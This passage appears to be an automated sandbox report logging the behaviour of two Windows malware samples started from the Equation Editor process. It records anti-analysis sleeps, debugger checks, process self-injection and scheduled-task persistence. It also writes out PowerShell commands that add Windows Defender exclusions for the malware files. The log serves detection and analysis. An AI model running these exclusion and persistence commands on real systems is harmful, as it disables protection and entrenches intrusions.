                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0040F7A7 Sleep,ExitProcess,25_2_0040F7A7
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory allocated: 1B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory allocated: 24D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory allocated: 400000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory allocated: 54B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory allocated: 64B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory allocated: 65E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory allocated: 75E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeMemory allocated: 170000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeMemory allocated: 2690000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeMemory allocated: 3D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeMemory allocated: 5660000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeMemory allocated: 51E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeMemory allocated: 6660000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeMemory allocated: 5310000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,25_2_0041A748
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2692Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2641Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2762Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2699Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrWindow / User API: threadDelayed 9327Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrWindow / User API: foregroundWindowGot 1624Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2075
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3211
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2470
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2905
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeAPI coverage: 7.2 %
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3260Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3612Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3536Thread sleep count: 2692 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3528Thread sleep count: 2641 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3700Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3716Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3624Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3744Thread sleep count: 225 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3744Thread sleep time: -112500s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3748Thread sleep count: 171 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3748Thread sleep time: -513000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3824Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3748Thread sleep count: 9327 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 3748Thread sleep time: -27981000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\taskeng.exe TID: 3900Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe TID: 2168Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe TID: 3920Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2652Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2520Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3996Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1396Thread sleep count: 2470 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1396Thread sleep count: 2905 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3356Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3276Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2496Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr TID: 2180Thread sleep time: -120000s >= -30000s
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3300Thread sleep time: -120000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_10006580 FindFirstFileExA,12_2_10006580
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0040AE51 FindFirstFileW,FindNextFileW,21_2_0040AE51
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407EF8
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407898
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,25_2_00409253
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,25_2_0041C291
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,25_2_0040C34D
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,25_2_00409665
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0044E879 FindFirstFileExA,25_2_0044E879
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,25_2_0040880C
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0040783C FindFirstFileW,FindNextFileW,25_2_0040783C
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,25_2_00419AF5
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,25_2_0040BB30
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,25_2_0040BD37
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,25_2_00407C97
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00418981 memset,GetSystemInfo,21_2_00418981
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrAPI call chain: ExitProcess graph end nodegraph_22-34268
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_100060E2
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,21_2_004044A4
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_10004AB4 mov eax, dword ptr fs:[00000030h]12_2_10004AB4
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_004432B5 mov eax, dword ptr fs:[00000030h]25_2_004432B5
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_1000724E GetProcessHeap,12_2_1000724E
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_100060E2
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_10002639
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_10002B1C
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00434B47 SetUnhandledExceptionFilter,25_2_00434B47
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_004349F9
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0043BB22
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_00434FDC
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory written: C:\Users\user\AppData\Roaming\plugman23456.scr base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeMemory written: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe base: 400000 value starts with: 4D5A
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: NULL target: C:\Users\user\AppData\Roaming\plugman23456.scr protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: NULL target: C:\Users\user\AppData\Roaming\plugman23456.scr protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: NULL target: C:\Users\user\AppData\Roaming\plugman23456.scr protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe25_2_004120F7
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00419627 mouse_event,25_2_00419627
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr "C:\Users\user\AppData\Roaming\plugman23456.scr"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr "C:\Users\user\AppData\Roaming\plugman23456.scr"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\bhyzucyduxfccvbqstsgmdbbressguvzg"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\ejlrnu"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\odrcnntyd"Jump to behavior
                  Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe C:\Users\user\AppData\Roaming\znlzneAxBVd.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpE15.tmp"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: plugman23456.scr, 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: logs.dat.12.drBinary or memory string: [Program Manager]
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_10002933 cpuid 12_2_10002933
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: EnumSystemLocalesW,25_2_00452036
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,25_2_004520C3
